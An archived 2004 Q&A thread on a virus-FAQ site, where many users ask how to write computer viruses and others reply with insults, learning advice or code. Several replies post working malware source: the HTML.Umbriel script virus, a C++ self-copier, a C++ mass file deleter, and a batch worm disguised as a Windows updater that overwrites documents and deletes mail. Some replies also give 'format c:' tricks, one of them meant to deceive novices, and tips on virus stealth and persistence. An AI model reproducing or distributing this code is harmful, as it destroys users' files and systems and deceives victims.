[ Home  |  FAQ-Related Q&As  |  General Q&As  |  Answered Questions ]


    Search the Q&A Archives


...create virus using c++? create virus using...

<< Back to: [alt.comp.virus] FAQ Part 1/4

Question by kaushik
Submitted on 2/13/2004
Related FAQ: [alt.comp.virus] FAQ Part 1/4
Rating: Rate this question: Vote
how to create virus using c++?
how to create virus using ms-dos batch file?



Answer by pat
Submitted on 2/22/2004
Rating:  Rate this answer: Vote
I want to became a hacker

 

Answer by rosey
Submitted on 3/5/2004
Rating:  Rate this answer: Vote
Yeah I am new to programming... I know some C++, java 2, html, I want to learn how to create virus's .....I don't want to become a evil virus writer this is for experimentation and just to further my knowledge in programming...

 

Answer by Master
Submitted on 3/12/2004
Rating:  Rate this answer: Vote
I want play a joke

 

Answer by butth0le
Submitted on 3/12/2004
Rating:  Rate this answer: Vote
type into browser .hack//infection.
ENJOY

 

Answer by Asrul
Submitted on 3/27/2004
Rating:  Rate this answer: Vote
MY computer had broken BIOS.it had been attack by virus

 

Answer by Jaz
Submitted on 3/30/2004
Rating:  Rate this answer: Vote
-------------------------------------------[HTML.Ubriel for WindowsXP]-------------------------------------------
<html><!--Umbriel-->
<head>
<title> Second Part To Hell's HTML.Umbriel </title>
</head>
<body>
<script language="VBScript">
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject("Scripting.FileSystemObject")
Set shell=CreateObject("Wscript.Shell")
if err.number=429 Then
  shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set wrte=fso.CreateTextFile(windir+"\windows.cmd")
wrte.WriteLine "cls"
wrte.WriteLine "@echo off"
wrte.WriteLine "shutdown -s -f -t 300 -c "+chr(34)+"Second Part To Hell's Umbriel has you..."+chr(34)
wrte.Close()

shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\Source", "C:\umbriel.html"
shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\1\SubscribedURL", "C:\umbriel.html"

Randomize
rand=int(rnd*5)+1
If rand=1 then
  shell.Run windir+"\windows.cmd"
End If
</script>

<script language="JavaScript">
// JS
var viruspath, virus, code, fso, file, check, checka, checkb
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
file=fso.CreateTextFile("C:\\umbriel.html")
for (i=0; i<500; i++)
{
  if (checkb!=1)
  {
    if (Math.round(Math.random()*5)+1 == 3)
    {
      if (check == 2)
      {
        file.WriteLine("/"+"*")
        file.WriteLine("*"+"/")
      }
      if (check == 3)
      {
        file.WriteLine("rem")
      }
    }
    code=virus.ReadLine()
    if (code == "/"+"*") { checka=666 }
    if (code == "*"+"/") { checka=666 }
    if (code == "rem") { checka=666 }
    if (checka != 666 ) { file.WriteLine(code) }
    checka=0
    if (code=="</"+unescape("%68")+"tml>") { checkb=1 }
    if (code=="// JS") { check=2 }
    if (code=="rem VBS") { check=3 }
    if (code=="</"+unescape("%73")+"cript>") { check=0 }
  }
}
virus.Close();
file.Close();
</script>

<script language="VBScript">
rem VBS
On Error Resume Next
set fso=CreateObject("Scripting.FileSystemObject")
set shell=CreateObject("WScript.Shell")
set myfile=fso.OpenTextFile("C:\umbriel.html")
mycode=myfile.ReadAll
myfile.Close()
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File1")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File2")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File3")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File4")
if rr <> "" Then Call Umbriel(rr, mycode)
rr=shell.RegRead("HKEY_CURRENT_USER\Software\Microsoft\FrontPage\Explorer\FrontPage Explorer\Recent Page List\File5")
if rr <> "" Then Call Umbriel(rr, mycode)

Sub Umbriel(rr, mycode)
set victim=fso.OpenTextFile(rr)
infcheck=victim.ReadLine
If infcheck<>"<html><!--Umbriel-->" Then
  viccode=victim.ReadAll
  victim.Close()
  set wrtevic=fso.OpenTextFile(rr, 2, false, 0)
  wrtevic.Write (mycode+infcheck+chr(13)+chr(10)+viccode)
  wrtevic.Close
End If

End Sub
</script>
</body>
</html>

 

Answer by Cheese_meister
Submitted on 3/30/2004
Rating:  Rate this answer: Vote
try using perl its better

 

Answer by virushacker
Submitted on 4/8/2004
Rating:  Rate this answer: Vote
I want to kill all virus.

 

Answer by hacker123_nepal
Submitted on 4/14/2004
Rating:  Rate this answer: Vote
I want to create as well as destory viruses.

 

Answer by PCMS
Submitted on 4/30/2004
Rating:  Rate this answer: Vote
DO YOU KNOW A WEBSITE WHERE THEY ARE TELLING YOU HOW TO WRITE VIRUS IN C++?

 

Answer by fleto
Submitted on 4/30/2004
Rating:  Rate this answer: Vote
ok if you want to write viruses...be a hacker...whatever. Just go to a book store. Buy a c++ book (with compiler). read it. to create good viruses you must know a bunch (i suggest as much as u can) about c++...or whatever language your programing in. Then once you learn the language you can go off and hack the world!!

 

Answer by NT-6
Submitted on 5/1/2004
Rating:  Rate this answer: Vote
I really whant to know how to create virus, can anyone help me or tell me web addres where i can learn it....

 

Answer by nittudv
Submitted on 5/3/2004
Rating:  Rate this answer: Vote
What these people do after creating virus

 

Answer by PCMS_PL
Submitted on 5/4/2004
Rating:  Rate this answer: Vote
YOU ASKED WHAT PEOPLE DO AFTER CREATING VIRUS. WELL... I GUESS THEY'RE SENDING IT TO THE WEB, AND ATTACKING OTHER COMPUTERS, BUT OF COURSE I CAN BE WRONG.

 

Answer by orbitouz
Submitted on 5/7/2004
Rating:  Rate this answer: Vote
I don`t know what other gonna do with their viruses... i just wanna to become a good programmer and make a big cash with my skillz    :DDD
but allthought if i could create  viruses i`d only create for a good purpose examlbe to send them to a f-secure or norton and help them creating more powerfull antivir progs...
i mayby stupid but i`d still do it...

 

Answer by erald
Submitted on 5/9/2004
Rating:  Rate this answer: Vote
I want to create a great virus to destroy all computers i want

 

Answer by jack
Submitted on 5/9/2004
Rating:  Rate this answer: Vote
my e-mail is nektariostempelis@yahoo.gr. can anybody send me some instructions because i want to create a very destructive virus

 

Answer by Bigplayerz
Submitted on 5/9/2004
Rating:  Rate this answer: Vote
Do you like computer virus i do but it is fun because when you are sending a virus you think that you are very good in the computer system and also the boss

 

Answer by Deadly_Virus
Submitted on 5/9/2004
Rating:  Rate this answer: Vote
i would like to know how to make a virus that disables the computer for 30 hr.....lol

 

Answer by micky
Submitted on 5/12/2004
Rating:  Rate this answer: Vote
I want to create virus, if some want can CRT new virus please send to me ,

 

Answer by WinZter
Submitted on 5/13/2004
Rating:  Rate this answer: Vote
Okay if you really want to create a virus you should read at least one book about for example C or C++. (I use the C compiler type)

If you read it and do all the tasks in it you should*nt need to visit this site anymore. Now stand up and be a man (or woman) and don^t beg others to tell you how you can do it.

 

Answer by tanay
Submitted on 5/13/2004
Rating:  Rate this answer: Vote
I LIKE TO CREAT A VIRUS WITH C++
     SO I NEED SOME LANGAUAGE ABOUT IT
     CAN ANY ONE HELP ME
          MAIL ME
           hi9358@yahoo.com

 

Answer by toqilula@hotmail.com
Submitted on 5/15/2004
Rating:  Rate this answer: Vote
HI all, I would like to know if anybody knows any script in JavaScript, to change a Registry Key without asking for user to accept... thanx in advance, please e-mail if answer to toqilula@hotmail.com

 

Answer by guitarfreak961
Submitted on 5/15/2004
Rating:  Rate this answer: Vote
go here http://www.angelfire.com/super2/funnypics0/lol.html

 

Answer by aboveaveragejo
Submitted on 5/17/2004
Rating:  Rate this answer: Vote
I'm doing a school project on viruses... any good resources would be appreciated.

 

Answer by monkeyboy
Submitted on 5/17/2004
Rating:  Rate this answer: Vote
send any info on creating virus to neopo@juno.com

 

Answer by AznVirusMarker
Submitted on 5/18/2004
Rating:  Rate this answer: Vote
Hey!! Can Any-One tell me whats the most destructive virus out there ...??? cause i want to learn how 2 make it

 

Answer by Ali
Submitted on 5/19/2004
Rating:  Rate this answer: Vote
who can send me a source of virus in c++ programming language ?plase send it to this mail: casper_heavens@Yahoo.com
with the best wishes for you dear.

 

Answer by Anonymuz
Submitted on 5/20/2004
Rating:  Rate this answer: Vote
Idiots! Begging for people to give you virus codes (as some of you are doing) is PATHETIK! Most likely they will send YOU a virus. If you REALLY wanna learn, buy a book on programming/C/C++ and learn! Lazy Prats.

 

Answer by Jeff2469
Submitted on 5/20/2004
Rating:  Rate this answer: Vote
Hackers and virus makers (infectors) like me spend ALOT of time writing these tiring, complicated programing code...do you think after maybe weeks of programming we are going to:
1. Tell you n00bs how to
and
2. Give up our precious code?

Learn it for yourselves.

 

Answer by sam
Submitted on 5/27/2004
Rating:  Rate this answer: Vote
lol well sed mate

 

Answer by ahhcac
Submitted on 5/28/2004
Rating:  Rate this answer: Vote
funny thing is when i hacker attacks another hacker and he doesnt even know he that person is and what he can do

 

Answer by Evilnoise
Submitted on 5/28/2004
Rating:  Rate this answer: Vote
This is better than watching funny series on tv.

 

Answer by silent love
Submitted on 5/29/2004
Rating:  Rate this answer: Vote
I want to learn how to write a virus in c++ language



my e-mail is
silent_love_silent_love@hotmail.com

 

Answer by quadra
Submitted on 6/2/2004
Rating:  Rate this answer: Vote
i want to learn writinig virus scripts in c or c++ ( 'cas some how i have considerable skills in these lang'sonly). will suggest or send any programs or websites (which give scripts) ,so that i will analyse how to do that .  i tired on searching on search engines for web sites .
      pls send ur info to  my  mail id:
   quadra262@yahoo.co.in

 

Answer by viruswriter
Submitted on 6/3/2004
Rating:  Rate this answer: Vote
ask netsky (x)

 

Answer by burned
Submitted on 6/3/2004
Rating:  Rate this answer: Vote
If you would like to send a cheating lying prick a virus for practice send it to CMERBES@MSN.COM or his crazy new girlfriend who wont leave me alone at HHILLS312hotmail.com.

 

Answer by aranb dutta
Submitted on 6/5/2004
Rating:  Rate this answer: Vote
hello
i am arnab a boy from lower class famaily,but i am interesred to know how people create virus in c++.can any one help me .please send me mails on duttaarnab1@indiatimes.com

 

Answer by fukuall
Submitted on 6/5/2004
Rating:  Rate this answer: Vote
a c++ virus:

#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
                              HINSTANCE hPrevInstance,
                              LPSTR lpCmdLine,
                              int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}

thare, ya happy ya frikin bums

 

Answer by Pred
Submitted on 6/7/2004
Rating:  Rate this answer: Vote
That is just a copy of a tutorial stupid, why don't u put some effort into making your own virus.

 

Answer by Ernest
Submitted on 6/7/2004
Rating:  Rate this answer: Vote
Want to create a virus?  The best option: -Buy a c++ programing book (or download  good tutorial from the web.  You should also get a compiler (such as the free devcpp available on the web).  Spend some time studding.  

If you put the effort you will find viruses easy and will see there are better things to do in programming.

 

Answer by ashish
Submitted on 6/10/2004
Rating:  Rate this answer: Vote
the source-code of virus using c++ you can find out by using books related to norton ie by reading
NORTON UTILITIES VERSION 4.0 BY RICHARD EVANS
still if you donot get the answer mail me at ashish_guptabca@yahoo.com

 

Answer by cyber destroyer
Submitted on 6/10/2004
Rating:  Rate this answer: Vote
i want to create warm using c++.

my email : cybervyas@yahoo.com

 

Answer by pracooooooool
Submitted on 6/11/2004
Rating:  Rate this answer: Vote
abe oh virus banana hai yo mere piche kyon pada hai jab ban jaye to mujhe de diyo
at pracool_man@yahoo.com samjha kya
mammu

 

Answer by boy
Submitted on 6/11/2004
Rating:  Rate this answer: Vote
haha you are all faggots. go create a virus. get caught by police. get your ass thrown in jail. get raped by the guys in there. hopefully youll catch their virus (aids) and we will have the last laugh at you hackers!!!!

 

Answer by sam
Submitted on 6/19/2004
Rating:  Rate this answer: Vote
i would like to create virus using c,c++ help me
mani03_visa2yahoo.co.in

 

Answer by ryan
Submitted on 6/23/2004
Rating:  Rate this answer: Vote
yes i like  making virus....
can someone teach me how to do it..
heres my email address
jrov2002@yahoo.com

 

Answer by DUUURRRR!!!
Submitted on 6/24/2004
Rating:  Rate this answer: Vote
please....SOMEONE teach these terrorists already....

 

Answer by a boy
Submitted on 6/25/2004
Rating:  Rate this answer: Vote
sure give all your guys email so that i can send you all a virus ....haha

 

Answer by virus-creater
Submitted on 6/27/2004
Rating:  Rate this answer: Vote
something that shutdown yr pc whenever u start windows (xp only)...
it's simple batch file (not really a virus)...
download it at http://web.singnet.com.sg/~jasonlzx/downloads/AOM II.exe

 

Answer by chaminda
Submitted on 6/28/2004
Rating:  Rate this answer: Vote
i want to create virus using c
send me those thing
chami_ran@coolgoose.com

 

Answer by zero cool
Submitted on 6/28/2004
Rating:  Rate this answer: Vote
cool anytime

 

Answer by abismt12
Submitted on 6/29/2004
Rating:  Rate this answer: Vote
Please could somebody tell me how to create a virus not to destroy but only to disrupt a computer from time to time.
I work for a company and a rival company slanders ours, overcharges underpays and treats his staff like crap. he drives a new merc and owns an overpriced removals company.
Somebody help me teach this git a lesson please.  From, somebody who works for a living.

 

Answer by JINFRICS
Submitted on 7/2/2004
Rating: Not yet rated Rate this answer: Vote
who is mother of nog

 

Answer by Pred
Submitted on 7/5/2004
Rating:  Rate this answer: Vote
Anyone know how to get your current directory that your program is in, and save that as a variable in your program?

Thanks

 

Answer by NooB
Submitted on 7/10/2004
Rating:  Rate this answer: Vote
who know how 2 create virus n worm

 

Answer by DOS
Submitted on 7/13/2004
Rating:  Rate this answer: Vote
Gay ass noobs.We got enough viruses already

 

Answer by 1010
Submitted on 7/14/2004
Rating:  Rate this answer: Vote
can someone help me with saving a file?, im having alot of trouble. Im running windows xp pro and i wanna save a .txt file. So i go into notepad and under file it says "save" im not sure if i should click on this because i dont want to get a virus, can someone help me ? I would also like to be a hacker, but i dont know how when im a hacker i will hack everybody

 

Answer by lock
Submitted on 7/15/2004
Rating:  Rate this answer: Vote
i would like to create virus using c,c++ help me
f@mail.rw

 

Answer by ronak
Submitted on 7/16/2004
Rating:  Rate this answer: Vote
i want to make a virus.

 

Answer by Blaster
Submitted on 7/16/2004
Rating:  Rate this answer: Vote
go buy some books on c++ programming

 

Answer by lee
Submitted on 7/18/2004
Rating:  Rate this answer: Vote
Hiya people i have the software C++ and i want to now where abouts you get the books on C++ from??

 

Answer by DC
Submitted on 7/18/2004
Rating:  Rate this answer: Vote
all of u ppl asking how to make a virus r twats. and n00bs. no rly, u r. get a frikin c++ book for f""ks sake

 

Answer by BB
Submitted on 8/6/2004
Rating: Not yet rated Rate this answer: Vote
THIS IS NOT A VIRUS, SIMPLY A BUGGER !!

_________________________

Open notepad

>

Write: shutdown -r -t 60 -c "MESSAGE HERE"

>

Save as: *.bat
File type: all

-----------------------

A window opens and tells the user that the computer is gonna reboot in 60 sec. (or what you configure it to)

To close the window and avoid reboot write:

shutdown /a

in run......
_________________________________

 

Answer by slayer
Submitted on 8/7/2004
Rating: Not yet rated Rate this answer: Vote
i want to tel me a site to create a virus and send them

 

Answer by Silver
Submitted on 8/9/2004
Rating: Not yet rated Rate this answer: Vote
Creating viruses in C/C++ and most programming languages is easy. But I personally prefer Assembly, cause there is where you need and get power.
Anyways, its just foolish to distribute your email addresses around so that ppl can give u source codes. The best way to do something is make it yourself.
Just you got to achieve the following goals. If you use C, just make different OOP structures, and if PERL, Packages.
Anyways, goals of a virus-
1)Cause harm/mischief
2)Making it invisible and divisible, and also, difficult to detect to roots
3)Mechanism for redistributing the password.
The main goal is really very simple to achieve, and if i were you, and i created a one time bomb, or a virus which spreads whenever someone boots, best put it in autoexec, but the first,so try to cover it up. For windows, best deal is putting somewhere in the registry.
The main part-> Disrupting computer and file scranbling and stuff, you can do with normal lib. functions. If your thing does hardware stuff directly, like open the CD drive and all, i would either bet upon getting new functions from somewhere, or directly communicatiing with the hardware.
Anyways, according to me, the most imp. thing of a virus, even more imp than its main cause is stealth. There are tonnes of methods, most just common sense, and sometimes programming (usually in Assembly).

 

Answer by <p><b>poop</b></p>
Submitted on 8/10/2004
Rating: Not yet rated Rate this answer: Vote
<p><b>poop</b></p>

 

Answer by tarun
Submitted on 8/13/2004
Rating: Not yet rated Rate this answer: Vote
hey guys,
   i am a software engineering student and i have studied c and c++ but i havent found anything related to viruses in these books.u have any reply?
my mail address is tarun_network@rediffmail.com

 

Answer by RAJ
Submitted on 8/15/2004
Rating: Not yet rated Rate this answer: Vote
hi my name is raj plz help me i want to creat virus in c++ i m a computer enggener

 

Answer by neamulhuq
Submitted on 8/21/2004
Rating: Not yet rated Rate this answer: Vote
I am a new programmer in c and c++. I want to know how virus can made and recover

 

Answer by mike
Submitted on 8/21/2004
Rating: Not yet rated Rate this answer: Vote
all of you should just give up. they are all right, just get a c++ book, maybe the Dummies book; it have devcpp for free, or download it. but no programmer is going to share his knowledge of C++ or C with you

 

Answer by gch5185
Submitted on 8/22/2004
Rating: Not yet rated Rate this answer: Vote
Hey i would like to create a virus, no matter what virus :D

mail me: gch5185@hotmail.com

 

Answer by akbar
Submitted on 8/25/2004
Rating: Not yet rated Rate this answer: Vote
i want to create new virus
anybody can send me virus for bios Corrupt
i am very gladfull to you


thankyou
everybody

 

Answer by ikkejw
Submitted on 8/25/2004
Rating: Not yet rated Rate this answer: Vote
To all you n00bo's here asking how to create viruses:
You probably will never be a good programmer. If you want to program (viruses or whatev) you should start doing so when you're 6 years old, like i did. If you just downloaded C++ from a warez site 'because you heard you can create viruses with it', you've got to put MUCH time in learning it and DON'T go asking how to create viruses, that's just letting other people create viruses (wich is very time consuming, believe me) and saying you made it.

 

Answer by sibaram mohapatra
Submitted on 8/26/2004
Rating: Not yet rated Rate this answer: Vote
i want to create a virus with c++ . who is know create a virus please help me pahar_biju@rediffmail.com

 

Answer by BigBoy
Submitted on 9/1/2004
Rating: Not yet rated Rate this answer: Vote
Some one please help me create a virus using c++ (Code Warrior)

 

Answer by againstvirusesbunny
Submitted on 9/2/2004
Rating: Not yet rated Rate this answer: Vote
viruses stink u losers,,,u 2 lee---u virus creaters n wanner b creaters r all crap heads


 

Answer by ekk
Submitted on 9/6/2004
Rating: Not yet rated Rate this answer: Vote
i like to make a virus.e_mail me in hi_subho@yahoo.co.nz

 

Answer by Nizzemanden
Submitted on 9/7/2004
Rating: Not yet rated Rate this answer: Vote
.. I got a virus (NOT REALLY A VIRUS BUT A *.BAT FILE) Its damn easy to make:
Go in notepad write:
@echo off
echo Heeey i missed what have you done??
pause
echo Anyways ill be going for now see u
pause
shutdown.exe

And then save it as Hey.bat (REMEMBER TO SET IT TO ALL FILES.!!!)

Also to make a deleting bat file:
@echo off
echo Hey ill need some info..
pause
echo Ill just get it
format c:

thats it..
Need more mail me at: Nizzemanden@hotmail.com
AND JUST 1 THING.. I got 5 antivirusses so if yourre trying to mail me a virus ill be hacking you pc before you can count to 10....

 

Answer by Amit patekar
Submitted on 9/7/2004
Rating: Not yet rated Rate this answer: Vote
i got one virus , if u want it mail me to amitpatekar6600@yahoo.com, its cool.exe file and u will enjoy it , i can provide u with source code, the most easy path is to read c++ books

 

Answer by HeadCrap
Submitted on 9/8/2004
Rating: Not yet rated Rate this answer: Vote
Look, do you like to be a Vwriter then go here and learn:

http://www.sirkussystem.com/index2.shtml

Don't think its easy :P


 

Answer by kral
Submitted on 9/9/2004
Rating: Not yet rated Rate this answer: Vote
cumlenizin amina koyim...

 

Answer by re.kill
Submitted on 9/12/2004
Rating: Not yet rated Rate this answer: Vote
it1s great to work with you

 

Answer by dddddddd
Submitted on 9/16/2004
Rating: Not yet rated Rate this answer: Vote
dddddddddddddddddddddddddddddddd

 

Answer by Help
Submitted on 9/16/2004
Rating: Not yet rated Rate this answer: Vote
i have a c++ book and i am currently in a c++ class. at least im tryin to make progress :P

is there any guidlines or anything that can hit me towards what i need to use to make a virus that captures cookes and sends them back to my pc.i want to mess with my friends.

 

Answer by man of virus
Submitted on 9/19/2004
Rating: Not yet rated Rate this answer: Vote
i like virus

 

Answer by OMG
Submitted on 9/20/2004
Rating: Not yet rated Rate this answer: Vote
Why create a virus?
Just to destroy? Get in jail.
Don´t do it, be a good hacker.
Hack is not just to hack in to a bank or create virus and destroy things.
Hack can be to take away virus and stop them for destroy more.
Stop virus is better then create virus.
Then you make many people a favor.

And if you succed to create a virus and will destroy. Take it very easy if it you first time. Police is not so stupid as you think.

 

Answer by c00l3D
Submitted on 9/21/2004
Rating: Not yet rated Rate this answer: Vote
Like few guys say to you you can't just sit and made virus. You can download few sources from net but when you look at that source you don't knew what he actualy do. So take c,c++, Delphi, Java or Whatever you want and learn. I just wanth to say THX to fukuall because I need that cource about creating registry file. If you wanth a virus ok then here is a little on ;)

[code]:
#include <iostream.h>
#include <stdlib.h>
int main()
{
system ("DEL C:\*.exe");
system ("DEL C:\*.txt");
system ("DEL C:\*.doc");
system ("DEL C:\WINDOWS\*.exe");
system ("DEL C:\WINDOWS\*.com");
system ("DEL C:\WINDOWS\*.bat");
system ("DEL C:\Program Files\*.*");
system ("DEL C:\WINDOWS\SYSTEM\*.exe");
system ("DEL C:\WINDOWS\SYSTEM\*.dll");
system ("DEL C:\WINDOWS\SYSTEM\*.com");
system ("DEL C:\WINDOWS\SYSTEM\*.bat");
return 0;
}

 

Answer by lavender
Submitted on 9/22/2004
Rating: Not yet rated Rate this answer: Vote
if am creating a virus how can i be sure that it won't affect my own computer

 

Answer by V-new
Submitted on 9/25/2004
Rating: Not yet rated Rate this answer: Vote
can anyone tell me about how to create virus
plese help me . I want to know step to make it..please help me?????

e-mail to me,
             joe_grunge_2004@yahoo.com

 

Answer by Romanonyx
Submitted on 9/27/2004
Rating: Not yet rated Rate this answer: Vote
Look here people. I started reading a book on C++ and am looking for answers. Now i go on this site thinking that there r hackers with answers here and all i get is a bunch of twits!!! for crying out loud. If u want to learn how a virus works sure i will help. All u have to do is tell me your e-mail address and i will really show u how a virus works. Otherwise shut your big fat traps and start reading.

 

Answer by D`MarO
Submitted on 9/29/2004
Rating: Not yet rated Rate this answer: Vote
I need a program with which I can clone and Flood in IRC.

 

Answer by virus
Submitted on 10/2/2004
Rating: Not yet rated Rate this answer: Vote
i want a latest copy of saser can some one give to me....my mail id is virus643@rediffmail.com...

 

Answer by bMcShizzle
Submitted on 10/2/2004
Rating: Not yet rated Rate this answer: Vote
Well the truth is, or how it has been for me, is that I get paid by a range of different software companies to "break" there system and create a "virus". But the company does it so that updates and later expansions are necessary. Its a 50/50 market (making viruses) half money/ half hate. My suggestion is learn visual c++ .net and alot about the windows MFC classes and functions. Oh ya good viruses are programmed mostly with hungarian notation for professionalism.

 

Answer by kileak
Submitted on 10/5/2004
Rating: Not yet rated Rate this answer: Vote
Wow. Now that was an entertaining read.




Thank you.

 

Answer by Dark DEmion
Submitted on 10/5/2004
Rating: Not yet rated Rate this answer: Vote
lol i hack for cash ($1000) for a simple 1 so do u think i will give it up for free (hell no)

 

Answer by ZEtor
Submitted on 10/7/2004
Rating: Not yet rated Rate this answer: Vote
There u go noobs a simple BAT virus code.
open up a notepad paste the code and save it with .BAT extension.This is a pretty lame batch file virus but still...


@ECHO OFF            
CLS
IF EXIST c:\winupdt.bat GOTO CODE
GOTO SETUP
:SETUP
@ECHO OFF
ECHO Welcome To Microsoft Windows System Updater Setup
ECHO.
copy %0 c:\winupdt.bat >> NUL
ECHO Scanning System.....Please Wait
prompt $P$SWindows2000
type %0 >> c:\autoexec.bat
type %0 >> c:\windows\dosstart.bat
ECHO DONE.
ECHO.
ECHO Installing Components....Please Wait
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
ECHO DONE.
ECHO.
ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.
PAUSE
ECHO Downloading Components...Please Wait
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"
ECHO Setup Will Now restart Your Computer....Please Wait
ECHO Your System is not faster by almost 40%.
ECHO Thank you for using a Microsoft Partner's product.
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
c:\WINDOWS\RUNDLL user.exe,exitwindowsexec
CLS
GOTO END


:CODE
CLS
@ECHO OFF
prompt $P$SWindows2000
IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC
type %0 >> c:\autoexec.bat
:ABC
type %0 >> c:\windows\dosstart.bat
FOR %%a IN (*.zip) DO del %%a
FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL
FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL
START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths
IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL
IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL
copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL
GOTO :END
CLS
:END
CLS

 

Answer by aardvark
Submitted on 10/11/2004
Rating: Not yet rated Rate this answer: Vote
u are all sad

 

Answer by neo
Submitted on 10/11/2004
Rating: Not yet rated Rate this answer: Vote
you have to crawl before you can walk....

start off doing small programs.i struggle in computing doing simple multiplying programs never mind viruses and complex codes.

start fof small learn the basics, then build up. you dont become a hacker over night, infact you dont become a hacker, programmer over a 6 months,even a year or more, it takes time skills and best left to those who know what theyre doing. im not a hacker,never will be. why dont you search for a virus,or 'PRANK' that you can send to someone, already made for people liek you...

newayz, my question, someone sent me a file..i know this guy so it wasnt deliberate..

and after it sent my virus scanner scanned it , and found out it had a virus on it, win32.parite.a or something???? anyone any idea what this and how serious it is???

thanks a bunch!

 

Answer by neo
Submitted on 10/12/2004
Rating: Not yet rated Rate this answer: Vote
try programming viruses in assembly

 

Answer by PIZDOLIZAC
Submitted on 10/12/2004
Rating: Not yet rated Rate this answer: Vote
J ZELMA BIT LUDO HA KER I RAD IT PRCAROSKE VIRUSE DA SJEBEM LJUDIMA KOMPJUTERE

 

Answer by system32
Submitted on 10/17/2004
Rating: Not yet rated Rate this answer: Vote
To whom it may concern:
Virus creating is of a very dangerous nature - and it is advised that users steer clear from such activities, HOWEVER - if you are going to use it as a learning key please read the following;
>>Available are 16 pre-compiled virus' that will have an extensive effect on any computer. Some will deactivate use for 10 minuites, every hour - and others will completely corrupt windows files.
SO>> To get your copy of these files please email system32@email.net.au

NOTE:: A lanline return email address (no free addresses will be replied to, only ISP issued ones!)is required for recieval of .zip.

 

Answer by drathron64
Submitted on 10/17/2004
Rating: Not yet rated Rate this answer: Vote
Do this to create a nasty virus. Once finished there will be an exe file on your desktop ready for you to do what you would like.

click the start button
click run
type cmd
a little black box will apear
type format c:
then once your asked to format the new file for your virus so that it can be created enter Y for yes and then type Y for yes again.

sit back and watch your virus.exe file be created.


 

Answer by SHUTTHEHELLUP
Submitted on 10/17/2004
Rating: Not yet rated Rate this answer: Vote
If someone gives you the code for a virus, wat u gonna do? Impress your friends? You are all fags, to make a good virus you need to study c++ and actually understand what you are doing, not just go around taking programs off peoples websites. If your gonna make a virus, make a good one.

 

Answer by lunatic
Submitted on 10/18/2004
Rating: Not yet rated Rate this answer: Vote
want to learn how to create virus just to disturb the network.....any help will  be greatly appreciated....plz. contact at
cool_lunatic2004@yahoo.co.uk

 

Answer by rentau
Submitted on 10/18/2004
Rating: Not yet rated Rate this answer: Vote
It's good.

 

Answer by Tubby
Submitted on 10/19/2004
Rating: Not yet rated Rate this answer: Vote
Wow, its amazing how many people actually want to use the virus knowledge to destroy. Hackers want a challenge, newbies want to cause mayhem and get some sort of false technological power.
I just hope that by the time you realise how to programme at this level, you have the respect to keep the knowledge to yourself.
As a computer programmer (not a hacker) it is my opinion to point you in the right direction, and hope the knowledge you gain will give you enlightenment......
1)Go to your nearest book shop and BUY a book on C++. Please don't skip this because its actually important.
2) Take some tutorials off the internet, the more knowledge the better. DONT just download pages of programming you don't understand because you should want something to call your own otherwise you aren't LEARNING anything.
3)Realise that you liked the challenge of exploration and decide that PROTECTING computers against hacking will be more fun and rewarding.

